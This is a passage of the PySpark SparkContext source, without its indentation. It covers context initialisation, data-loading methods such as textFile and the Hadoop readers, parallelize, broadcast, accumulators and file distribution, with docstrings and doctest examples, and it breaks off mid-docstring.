processes out of the box, and PySpark does not guarantee multi-processing execution.
Use threads instead for concurrent processing purposes.
Examples
--------
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> sc2 = SparkContext('local', 'test2') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError: ...
"""
_gateway = None
_jvm = None
_next_accum_id = 0
_active_spark_context = None
_lock = RLock()
_python_includes = None # zip and egg files that need to be added to PYTHONPATH
PACKAGE_EXTENSIONS = ('.zip', '.egg', '.jar')
def __init__(self, master=None, appName=None, sparkHome=None, pyFiles=None,
environment=None, batchSize=0, serializer=PickleSerializer(), conf=None,
gateway=None, jsc=None, profiler_cls=BasicProfiler):
if (conf is None or
conf.get("spark.executor.allowSparkContext", "false").lower() != "true"):
# In order to prevent SparkContext from being created in executors.
SparkContext._assert_on_driver()
self._callsite = first_spark_call() or CallSite(None, None, None)
if gateway is not None and gateway.gateway_parameters.auth_token is None:
raise ValueError(
"You are trying to pass an insecure Py4j gateway to Spark. This"
" is not allowed as it is a security risk.")
SparkContext._ensure_initialized(self, gateway=gateway, conf=conf)
try:
self._do_init(master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls)
except:
# If an error occurs, clean up in order to allow future SparkContext creation:
self.stop()
raise
def _do_init(self, master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls):
self.environment = environment or {}
# java gateway must have been launched at this point.
if conf is not None and conf._jconf is not None:
# conf has been initialized in JVM properly, so use conf directly. This represents the
# scenario that JVM has been launched before SparkConf is created (e.g. SparkContext is
# created and then stopped, and we create a new SparkConf and new SparkContext again)
self._conf = conf
else:
self._conf = SparkConf(_jvm=SparkContext._jvm)
if conf is not None:
for k, v in conf.getAll():
self._conf.set(k, v)
self._batchSize = batchSize # -1 represents an unlimited batch size
self._unbatched_serializer = serializer
if batchSize == 0:
self.serializer = AutoBatchedSerializer(self._unbatched_serializer)
else:
self.serializer = BatchedSerializer(self._unbatched_serializer,
batchSize)
# Set any parameters passed directly to us on the conf
if master:
self._conf.setMaster(master)
if appName:
self._conf.setAppName(appName)
if sparkHome:
self._conf.setSparkHome(sparkHome)
if environment:
for key, value in environment.items():
self._conf.setExecutorEnv(key, value)
for key, value in DEFAULT_CONFIGS.items():
self._conf.setIfMissing(key, value)
# Check that we have at least the required parameters
if not self._conf.contains("spark.master"):
raise RuntimeError("A master URL must be set in your configuration")
if not self._conf.contains("spark.app.name"):
raise RuntimeError("An application name must be set in your configuration")
# Read back our properties from the conf in case we loaded some of them from
# the classpath or an external config file
self.master = self._conf.get("spark.master")
self.appName = self._conf.get("spark.app.name")
self.sparkHome = self._conf.get("spark.home", None)
for (k, v) in self._conf.getAll():
if k.startswith("spark.executorEnv."):
varName = k[len("spark.executorEnv."):]
self.environment[varName] = v
self.environment["PYTHONHASHSEED"] = os.environ.get("PYTHONHASHSEED", "0")
# Create the Java SparkContext through Py4J
self._jsc = jsc or self._initialize_context(self._conf._jconf)
# Reset the SparkConf to the one actually used by the SparkContext in JVM.
self._conf = SparkConf(_jconf=self._jsc.sc().conf())
# Create a single Accumulator in Java that we'll send all our updates through;
# they will be passed back to us through a TCP server
auth_token = self._gateway.gateway_parameters.auth_token
self._accumulatorServer = accumulators._start_update_server(auth_token)
(host, port) = self._accumulatorServer.server_address
self._javaAccumulator = self._jvm.PythonAccumulatorV2(host, port, auth_token)
self._jsc.sc().register(self._javaAccumulator)
# If encryption is enabled, we need to setup a server in the jvm to read broadcast
# data via a socket.
# scala's mangled names w/ $ in them require special treatment.
self._encryption_enabled = self._jvm.PythonUtils.isEncryptionEnabled(self._jsc)
os.environ["SPARK_AUTH_SOCKET_TIMEOUT"] = \
str(self._jvm.PythonUtils.getPythonAuthSocketTimeout(self._jsc))
os.environ["SPARK_BUFFER_SIZE"] = \
str(self._jvm.PythonUtils.getSparkBufferSize(self._jsc))
self.pythonExec = os.environ.get("PYSPARK_PYTHON", 'python3')
self.pythonVer = "%d.%d" % sys.version_info[:2]
if sys.version_info[:2] < (3, 7):
with warnings.catch_warnings():
warnings.simplefilter("once")
warnings.warn(
"Python 3.6 support is deprecated in Spark 3.2.",
FutureWarning
)
# Broadcast's __reduce__ method stores Broadcast instances here.
# This allows other code to determine which Broadcast instances have
# been pickled, so it can determine which Java broadcast objects to
# send.
self._pickled_broadcast_vars = BroadcastPickleRegistry()
SparkFiles._sc = self
root_dir = SparkFiles.getRootDirectory()
sys.path.insert(1, root_dir)
# Deploy any code dependencies specified in the constructor
self._python_includes = list()
for path in (pyFiles or []):
self.addPyFile(path)
# Deploy code dependencies set by spark-submit; these will already have been added
# with SparkContext.addFile, so we just need to add them to the PYTHONPATH
for path in self._conf.get("spark.submit.pyFiles", "").split(","):
if path != "":
(dirname, filename) = os.path.split(path)
try:
filepath = os.path.join(SparkFiles.getRootDirectory(), filename)
if not os.path.exists(filepath):
# In case of YARN with shell mode, 'spark.submit.pyFiles' files are
# not added via SparkContext.addFile. Here we check if the file exists,
# try to copy and then add it to the path. See SPARK-21945.
shutil.copyfile(path, filepath)
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
sys.path.insert(1, filepath)
except Exception:
warnings.warn(
"Failed to add file [%s] specified in 'spark.submit.pyFiles' to "
"Python path:\n %s" % (path, "\n ".join(sys.path)),
RuntimeWarning)
# Create a temporary directory inside spark.local.dir:
local_dir = self._jvm.org.apache.spark.util.Utils.getLocalDir(self._jsc.sc().conf())
self._temp_dir = \
self._jvm.org.apache.spark.util.Utils.createTempDir(local_dir, "pyspark") \
.getAbsolutePath()
# profiling stats collected for each PythonRDD
if self._conf.get("spark.python.profile", "false") == "true":
dump_path = self._conf.get("spark.python.profile.dump", None)
self.profiler_collector = ProfilerCollector(profiler_cls, dump_path)
else:
self.profiler_collector = None
# create a signal handler which would be invoked on receiving SIGINT
def signal_handler(signal, frame):
self.cancelAllJobs()
raise KeyboardInterrupt()
# see http://stackoverflow.com/questions/23206787/
if isinstance(threading.current_thread(), threading._MainThread):
signal.signal(signal.SIGINT, signal_handler)
def __repr__(self):
return "<SparkContext master={master} appName={appName}>".format(
master=self.master,
appName=self.appName,
)
def _repr_html_(self):
return """
<div>
<p><b>SparkContext</b></p>
<p><a href="{sc.uiWebUrl}">Spark UI</a></p>
<dl>
<dt>Version</dt>
<dd><code>v{sc.version}</code></dd>
<dt>Master</dt>
<dd><code>{sc.master}</code></dd>
<dt>AppName</dt>
<dd><code>{sc.appName}</code></dd>
</dl>
</div>
""".format(
sc=self
)
def _initialize_context(self, jconf):
"""
Initialize SparkContext in function to allow subclass specific initialization
"""
return self._jvm.JavaSparkContext(jconf)
@classmethod
def _ensure_initialized(cls, instance=None, gateway=None, conf=None):
"""
Checks whether a SparkContext is initialized or not.
Throws error if a SparkContext is already running.
"""
with SparkContext._lock:
if not SparkContext._gateway:
SparkContext._gateway = gateway or launch_gateway(conf)
SparkContext._jvm = SparkContext._gateway.jvm
if instance:
if (SparkContext._active_spark_context and
SparkContext._active_spark_context != instance):
currentMaster = SparkContext._active_spark_context.master
currentAppName = SparkContext._active_spark_context.appName
callsite = SparkContext._active_spark_context._callsite
# Raise error if there is already a running Spark context
raise ValueError(
"Cannot run multiple SparkContexts at once; "
"existing SparkContext(app=%s, master=%s)"
" created by %s at %s:%s "
% (currentAppName, currentMaster,
callsite.function, callsite.file, callsite.linenum))
else:
SparkContext._active_spark_context = instance
def __getnewargs__(self):
# This method is called when attempting to pickle SparkContext, which is always an error:
raise RuntimeError(
"It appears that you are attempting to reference SparkContext from a broadcast "
"variable, action, or transformation. SparkContext can only be used on the driver, "
"not in code that it run on workers. For more information, see SPARK-5063."
)
def __enter__(self):
"""
Enable 'with SparkContext(...) as sc: app(sc)' syntax.
"""
return self
def __exit__(self, type, value, trace):
"""
Enable 'with SparkContext(...) as sc: app' syntax.
Specifically stop the context on exit of the with block.
"""
self.stop()
@classmethod
def getOrCreate(cls, conf=None):
"""
Get or instantiate a SparkContext and register it as a singleton object.
Parameters
----------
conf : :py:class:`pyspark.SparkConf`, optional
"""
with SparkContext._lock:
if SparkContext._active_spark_context is None:
SparkContext(conf=conf or SparkConf())
return SparkContext._active_spark_context
def setLogLevel(self, logLevel):
"""
Control our logLevel. This overrides any user-defined log settings.
Valid log levels include: ALL, DEBUG, ERROR, FATAL, INFO, OFF, TRACE, WARN
"""
self._jsc.setLogLevel(logLevel)
@classmethod
def setSystemProperty(cls, key, value):
"""
Set a Java system property, such as spark.executor.memory. This must
be invoked before instantiating SparkContext.
"""
SparkContext._ensure_initialized()
SparkContext._jvm.java.lang.System.setProperty(key, value)
@property
def version(self):
"""
The version of Spark on which this application is running.
"""
return self._jsc.version()
@property
def applicationId(self):
"""
A unique identifier for the Spark application.
Its format depends on the scheduler implementation.
* in case of local spark app something like 'local-1433865536131'
* in case of YARN something like 'application_1433865536131_34483'
Examples
--------
>>> sc.applicationId # doctest: +ELLIPSIS
'local-...'
"""
return self._jsc.sc().applicationId()
@property
def uiWebUrl(self):
"""Return the URL of the SparkUI instance started by this SparkContext"""
return self._jsc.sc().uiWebUrl().get()
@property
def startTime(self):
"""Return the epoch time when the Spark Context was started."""
return self._jsc.startTime()
@property
def defaultParallelism(self):
"""
Default level of parallelism to use when not given by user (e.g. for
reduce tasks)
"""
return self._jsc.sc().defaultParallelism()
@property
def defaultMinPartitions(self):
"""
Default min number of partitions for Hadoop RDDs when not given by user
"""
return self._jsc.sc().defaultMinPartitions()
def stop(self):
"""
Shut down the SparkContext.
"""
if getattr(self, "_jsc", None):
try:
self._jsc.stop()
except Py4JError:
# Case: SPARK-18523
warnings.warn(
'Unable to cleanly shutdown Spark JVM process.'
' It is possible that the process has crashed,'
' been killed or may also be in a zombie state.',
RuntimeWarning
)
finally:
self._jsc = None
if getattr(self, "_accumulatorServer", None):
self._accumulatorServer.shutdown()
self._accumulatorServer = None
with SparkContext._lock:
SparkContext._active_spark_context = None
def emptyRDD(self):
"""
Create an RDD that has no partitions or elements.
"""
return RDD(self._jsc.emptyRDD(), self, NoOpSerializer())
def range(self, start, end=None, step=1, numSlices=None):
"""
Create a new RDD of int containing elements from `start` to `end`
(exclusive), increased by `step` every element. Can be called the same
way as python's built-in range() function. If called with a single argument,
the argument is interpreted as `end`, and `start` is set to 0.
Parameters
----------
start : int
the start value
end : int, optional
the end value (exclusive)
step : int, optional
the incremental step (default: 1)
numSlices : int, optional
the number of partitions of the new RDD
Returns
-------
:py:class:`pyspark.RDD`
An RDD of int
Examples
--------
>>> sc.range(5).collect()
[0, 1, 2, 3, 4]
>>> sc.range(2, 4).collect()
[2, 3]
>>> sc.range(1, 7, 2).collect()
[1, 3, 5]
"""
if end is None:
end = start
start = 0
return self.parallelize(range(start, end, step), numSlices)
def parallelize(self, c, numSlices=None):
"""
Distribute a local Python collection to form an RDD. Using range
is recommended if the input represents a range, since the elements can then be
generated on the executors rather than serialized and shipped from the driver.
Examples
--------
>>> sc.parallelize([0, 2, 3, 4, 6], 5).glom().collect()
[[0], [2], [3], [4], [6]]
>>> sc.parallelize(range(0, 6, 2), 5).glom().collect()
[[], [0], [], [2], [4]]
"""
numSlices = int(numSlices) if numSlices is not None else self.defaultParallelism
if isinstance(c, range):
size = len(c)
if size == 0:
return self.parallelize([], numSlices)
step = c[1] - c[0] if size > 1 else 1
start0 = c[0]
def getStart(split):
return start0 + int((split * size / numSlices)) * step
def f(split, iterator):
# it's an empty iterator here but we need this line for triggering the
# logic of signal handling in FramedSerializer.load_stream, for instance,
# SpecialLengths.END_OF_DATA_SECTION in _read_with_length. Since
# FramedSerializer.load_stream produces a generator, the control should
# at least be in that function once. Here we do it by explicitly converting
# the empty iterator to a list, thus make sure worker reuse takes effect.
# See more details in SPARK-26549.
assert len(list(iterator)) == 0
return range(getStart(split), getStart(split + 1), step)
return self.parallelize([], numSlices).mapPartitionsWithIndex(f)
# Make sure we distribute data evenly if it's smaller than self.batchSize
if "__len__" not in dir(c):
c = list(c) # Make it a list so we can compute its length
batchSize = max(1, min(len(c) // numSlices, self._batchSize or 1024))
serializer = BatchedSerializer(self._unbatched_serializer, batchSize)
def reader_func(temp_filename):
return self._jvm.PythonRDD.readRDDFromFile(self._jsc, temp_filename, numSlices)
def createRDDServer():
return self._jvm.PythonParallelizeServer(self._jsc.sc(), numSlices)
jrdd = self._serialize_to_jvm(c, serializer, reader_func, createRDDServer)
return RDD(jrdd, self, serializer)
def _serialize_to_jvm(self, data, serializer, reader_func, createRDDServer):
"""
Using py4j to send a large dataset to the jvm is really slow, so we use either a file
or a socket if we have encryption enabled.
Parameters
----------
data
object to be serialized
serializer : :py:class:`pyspark.serializers.Serializer`
reader_func : function
A function which takes a filename and reads in the data in the jvm and
returns a JavaRDD. Only used when encryption is disabled.
createRDDServer : function
A function which creates a PythonRDDServer in the jvm to
accept the serialized data, for use when encryption is enabled.
"""
if self._encryption_enabled:
# with encryption, we open a server in java and send the data directly
server = createRDDServer()
(sock_file, _) = local_connect_and_auth(server.port(), server.secret())
chunked_out = ChunkedStream(sock_file, 8192)
serializer.dump_stream(data, chunked_out)
chunked_out.close()
# this call will block until the server has read all the data and processed it (or
# throws an exception)
r = server.getResult()
return r
else:
# without encryption, we serialize to a file, and we read the file in java and
# parallelize from there.
tempFile = NamedTemporaryFile(delete=False, dir=self._temp_dir)
try:
try:
serializer.dump_stream(data, tempFile)
finally:
tempFile.close()
return reader_func(tempFile.name)
finally:
# we eagerly read the file so we can delete it right after.
os.unlink(tempFile.name)
def pickleFile(self, name, minPartitions=None):
"""
Load an RDD previously saved using :meth:`RDD.saveAsPickleFile` method.
Examples
--------
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize(range(10)).saveAsPickleFile(tmpFile.name, 5)
>>> sorted(sc.pickleFile(tmpFile.name, 3).collect())
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.objectFile(name, minPartitions), self)
def textFile(self, name, minPartitions=None, use_unicode=True):
"""
Read a text file from HDFS, a local file system (available on all
nodes), or any Hadoop-supported file system URI, and return it as an
RDD of Strings.
The text files must be encoded as UTF-8.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
Examples
--------
>>> path = os.path.join(tempdir, "sample-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello world!")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
['Hello world!']
"""
minPartitions = minPartitions or min(self.defaultParallelism, 2)
return RDD(self._jsc.textFile(name, minPartitions), self,
UTF8Deserializer(use_unicode))
def wholeTextFiles(self, path, minPartitions=None, use_unicode=True):
"""
Read a directory of text files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system
URI. Each file is read as a single record and returned in a
key-value pair, where the key is the path of each file, the
value is the content of each file.
The text files must be encoded as UTF-8.
If `use_unicode` is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
For example, if you have the following files:
.. code-block:: text
hdfs://a-hdfs-path/part-00000
hdfs://a-hdfs-path/part-00001
...
hdfs://a-hdfs-path/part-nnnnn
Do ``rdd = sparkContext.wholeTextFiles("hdfs://a-hdfs-path")``,
then ``rdd`` contains:
.. code-block:: text
(a-hdfs-path/part-00000, its content)
(a-hdfs-path/part-00001, its content)
...
(a-hdfs-path/part-nnnnn, its content)
Notes
-----
Small files are preferred, as each file will be loaded fully in memory.
Examples
--------
>>> dirPath = os.path.join(tempdir, "files")
>>> os.mkdir(dirPath)
>>> with open(os.path.join(dirPath, "1.txt"), "w") as file1:
... _ = file1.write("1")
>>> with open(os.path.join(dirPath, "2.txt"), "w") as file2:
... _ = file2.write("2")
>>> textFiles = sc.wholeTextFiles(dirPath)
>>> sorted(textFiles.collect())
[('.../1.txt', '1'), ('.../2.txt', '2')]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.wholeTextFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(use_unicode), UTF8Deserializer(use_unicode)))
def binaryFiles(self, path, minPartitions=None):
"""
Read a directory of binary files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system URI
as a byte array. Each file is read as a single record and returned
in a key-value pair, where the key is the path of each file, the
value is the content of each file.
Notes
-----
Small files are preferred; large files are also allowed, but may cause poor performance.
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.binaryFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(), NoOpSerializer()))
def binaryRecords(self, path, recordLength):
"""
Load data from a flat binary file, assuming each record is a set of numbers
with the specified numerical format (see ByteBuffer), and the number of
bytes per record is constant.
Parameters
----------
path : str
Directory to the input data files
recordLength : int
The length at which to split the records
"""
return RDD(self._jsc.binaryRecords(path, recordLength), self, NoOpSerializer())
def _dictToJavaMap(self, d):
jm = self._jvm.java.util.HashMap()
if not d:
d = {}
for k, v in d.items():
jm[k] = v
return jm
def sequenceFile(self, path, keyClass=None, valueClass=None, keyConverter=None,
valueConverter=None, minSplits=None, batchSize=0):
"""
Read a Hadoop SequenceFile with arbitrary key and value Writable class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is as follows:
1. A Java RDD is created from the SequenceFile or other InputFormat, and the key
and value Writable classes
2. Serialization is attempted via Pyrolite pickling
3. If this fails, the fallback is to call 'toString' on each key and value
4. :class:`PickleSerializer` is used to deserialize pickled objects on the Python side
Parameters
----------
path : str
path to sequencefile
keyClass: str, optional
fully qualified classname of key Writable class (e.g. "org.apache.hadoop.io.Text")
valueClass : str, optional
fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
keyConverter : str, optional
fully qualified name of a function returning key WritableConverter
valueConverter : str, optional
fully qualified name of a function returning value WritableConverter
minSplits : int, optional
minimum splits in dataset (default min(2, sc.defaultParallelism))
batchSize : int, optional
The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
minSplits = minSplits or min(self.defaultParallelism, 2)
jrdd = self._jvm.PythonRDD.sequenceFile(self._jsc, path, keyClass, valueClass,
keyConverter, valueConverter, minSplits, batchSize)
return RDD(jrdd, self)
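    # Illustrative usage sketch (not part of the upstream docstring); per the signature
    # above, keyClass and valueClass are optional and may be omitted:
    #
    #   rdd = sc.sequenceFile("hdfs://some-path/part-00000")
    #   rdd = sc.sequenceFile("hdfs://some-path/part-00000",
    #                         keyClass="org.apache.hadoop.io.Text",
    #                         valueClass="org.apache.hadoop.io.LongWritable")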
def newAPIHadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for :py:meth:`SparkContext.sequenceFile`.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java
Parameters
----------
path : str
path to Hadoop file
inputFormatClass : str
fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
keyClass : str
fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
valueClass : str
fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
keyConverter : str, optional
fully qualified name of a function returning key WritableConverter
None by default
valueConverter : str, optional
fully qualified name of a function returning value WritableConverter
None by default
conf : dict, optional
Hadoop configuration, passed in as a dict
None by default
batchSize : int, optional
The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def newAPIHadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for :py:meth:`SparkContext.sequenceFile`.
Parameters
----------
inputFormatClass : str
fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
keyClass : str
fully qualified classname of key Writable class (e.g. "org.apache.hadoop.io.Text")
valueClass : str
fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
keyConverter : str, optional
fully qualified name of a function returning key WritableConverter
(None by default)
valueConverter : str, optional
fully qualified name of a function returning value WritableConverter
(None by default)
conf : dict, optional
Hadoop configuration, passed in as a dict (None by default)
batchSize : int, optional
The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for :py:meth:`SparkContext.sequenceFile`.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java.
Parameters
----------
path : str
path to Hadoop file
inputFormatClass : str
fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
keyClass : str
fully qualified classname of key Writable class (e.g. "org.apache.hadoop.io.Text")
valueClass : str
fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
keyConverter : str, optional
fully qualified name of a function returning key WritableConverter
(None by default)
valueConverter : str, optional
fully qualified name of a function returning value WritableConverter
(None by default)
conf : dict, optional
Hadoop configuration, passed in as a dict (None by default)
batchSize : int, optional
The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for :py:meth:`SparkContext.sequenceFile`.
Parameters
----------
inputFormatClass : str
fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
keyClass : str
fully qualified classname of key Writable class (e.g. "org.apache.hadoop.io.Text")
valueClass : str
fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
keyConverter : str, optional
fully qualified name of a function returning key WritableConverter
(None by default)
valueConverter : str, optional
fully qualified name of a function returning value WritableConverter
(None by default)
conf : dict, optional
Hadoop configuration, passed in as a dict (None by default)
batchSize : int, optional
The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def _checkpointFile(self, name, input_deserializer):
jrdd = self._jsc.checkpointFile(name)
return RDD(jrdd, self, input_deserializer)
def union(self, rdds):
"""
Build the union of a list of RDDs.
This supports unions() of RDDs with different serialized formats,
although this forces them to be reserialized using the default
serializer:
Examples
--------
>>> path = os.path.join(tempdir, "union-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
['Hello']
>>> parallelized = sc.parallelize(["World!"])
>>> sorted(sc.union([textFile, parallelized]).collect())
['Hello', 'World!']
"""
first_jrdd_deserializer = rdds[0]._jrdd_deserializer
if any(x._jrdd_deserializer != first_jrdd_deserializer for x in rdds):
rdds = [x._reserialize() for x in rdds]
gw = SparkContext._gateway
jvm = SparkContext._jvm
jrdd_cls = jvm.org.apache.spark.api.java.JavaRDD
jpair_rdd_cls = jvm.org.apache.spark.api.java.JavaPairRDD
jdouble_rdd_cls = jvm.org.apache.spark.api.java.JavaDoubleRDD
if is_instance_of(gw, rdds[0]._jrdd, jrdd_cls):
cls = jrdd_cls
elif is_instance_of(gw, rdds[0]._jrdd, jpair_rdd_cls):
cls = jpair_rdd_cls
elif is_instance_of(gw, rdds[0]._jrdd, jdouble_rdd_cls):
cls = jdouble_rdd_cls
else:
cls_name = rdds[0]._jrdd.getClass().getCanonicalName()
raise TypeError("Unsupported Java RDD class %s" % cls_name)
jrdds = gw.new_array(cls, len(rdds))
for i in range(0, len(rdds)):
jrdds[i] = rdds[i]._jrdd
return RDD(self._jsc.union(jrdds), self, rdds[0]._jrdd_deserializer)
def broadcast(self, value):
"""
Broadcast a read-only variable to the cluster, returning a :class:`Broadcast`
object for reading it in distributed functions. The variable will
be sent to each cluster only once.
"""
return Broadcast(self, value, self._pickled_broadcast_vars)
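    # Usage sketch (illustrative, not part of the upstream docstring): the broadcast
    # value is read inside tasks through the Broadcast object's ``value`` attribute:
    #
    #   lookup = sc.broadcast({"a": 1, "b": 2})
    #   sc.parallelize(["a", "b", "a"]).map(lambda k: lookup.value[k]).collect()
    #   # -> [1, 2, 1]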
def accumulator(self, value, accum_param=None):
"""
Create an :class:`Accumulator` with the given initial value, using a given
:class:`AccumulatorParam` helper object to define how to add values of the
data type if provided. Default AccumulatorParams are used for integers
and floating-point numbers if you do not provide one. For other types,
a custom AccumulatorParam can be used.
"""
if accum_param is None:
if isinstance(value, int):
accum_param = accumulators.INT_ACCUMULATOR_PARAM
elif isinstance(value, float):
accum_param = accumulators.FLOAT_ACCUMULATOR_PARAM
elif isinstance(value, complex):
accum_param = accumulators.COMPLEX_ACCUMULATOR_PARAM
else:
raise TypeError("No default accumulator param for type %s" % type(value))
SparkContext._next_accum_id += 1
return Accumulator(SparkContext._next_accum_id - 1, value, accum_param)
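    # Usage sketch (illustrative, not part of the upstream docstring): workers can only
    # add to an accumulator; the aggregated result is read on the driver via ``value``:
    #
    #   counter = sc.accumulator(0)
    #   sc.parallelize([1, 2, 3, 4]).foreach(lambda x: counter.add(x))
    #   counter.value  # -> 10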
def addFile(self, path, recursive=False):
"""
Add a file to be downloaded with this Spark job on every node.
The `path` passed can be either a local file, a file in HDFS
(or other Hadoop-supported filesystems), or an HTTP, HTTPS or
FTP URI.
To access the file in Spark jobs, use :meth:`SparkFiles.get` with the
filename to find its download location.
A directory can be given if the recursive option is set to True.
Currently directories are only supported for Hadoop-supported filesystems.
Notes
-----
A path can be added only once. Subsequent additions of the same path are ignored.
Examples
--------
>>> from pyspark import SparkFiles
>>> path = os.path.join(tempdir, "test.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("100")
>>> sc.addFile(path)
>>> def func(iterator):
... with open(SparkFiles.get("test.txt")) as testFile:
... fileVal = int(testFile.readline())
... return [x * fileVal for x in iterator]
>>> sc.parallelize([1, 2, 3, 4]).mapPartitions(func).collect()
[100, 200, 300, 400]
"""
self._jsc.sc().addFile(path, recursive)
def addPyFile(self, path):
"""
Add a .py or .zip dependency for all tasks to be executed on this
SparkContext in the future. The `path` passed can be either a local
file, a file in HDFS (or other Hadoop-supported filesystems), or an
HTTP, HTTPS or FTP URI.
Notes
-----
A path can be added only once. Subsequent additions of the same path are ignored.
"""
self.addFile(path)
(dirname, filename) = os.path.split(path) # dirname may be directory or HDFS/S3 prefix
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
# for tests in local mode
sys.path.insert(1, os.path.join(SparkFiles.getRootDirectory(), filename))
importlib.invalidate_caches()
def setCheckpointDir(self, dirName):
"""
Set the directory under which RDDs are going to be checkpointed. The
directory must be an HDFS path if running on a cluster.
"""
self._jsc.sc().setCheckpointDir(dirName)
@since(3.1)
def getCheckpointDir(self):
"""
Return the directory where RDDs are checkpointed. Returns None if no
checkpoint directory has been set.
"""
if not self._jsc.sc().getCheckpointDir().isEmpty():
return self._jsc.sc().getCheckpointDir().get()
return None
def _getJavaStorageLevel(self, storageLevel):
"""
Returns a Java StorageLevel based on a pyspark.StorageLevel.
"""
if not isinstance(storageLevel, StorageLevel):
raise TypeError("storageLevel must be of type pyspark.StorageLevel")
newStorageLevel = self._jvm.org.apache.spark.storage.StorageLevel
return newStorageLevel(storageLevel.useDisk,
storageLevel.useMemory,
storageLevel.useOffHeap,
storageLevel.deserialized,
storageLevel.replication)
def setJobGroup(self, groupId, description, interruptOnCancel=False):
"""
Assigns a group ID to all the jobs started by this thread until the group ID is set to a
different value or cleared.
Often, a unit of execution in an application consists of multiple Spark actions or jobs.
Application programmers can use this method to group all those jobs together and give a
group description. Once set, the Spark web UI will associate such jobs with this group.
The application can use :meth:`SparkContext.cancelJobGroup` to cancel all
running jobs in this group.
Notes
-----
If interruptOnCancel is set to true for the job group, then job cancellation will result
in Thread.interrupt() being called on the job's executor threads. This is useful to help
ensure that the tasks are actually stopped in a timely manner, but is off by default due
to HDFS-1208, where HDFS may respond to Thread.interrupt() by marking nodes as dead.
If you run jobs in parallel, use :class:`pyspark.InheritableThread` for thread-local
inheritance and to prevent resource leaks.
Examples
--------
>>> import threading
>>> from time import sleep
>>> from pyspark import InheritableThread
>>> result = "Not Set"
>>> lock = threading.Lock()
>>> def map_func(x):
... sleep(100)
... raise RuntimeError("Task should have been cancelled")
>>> def start_job(x):
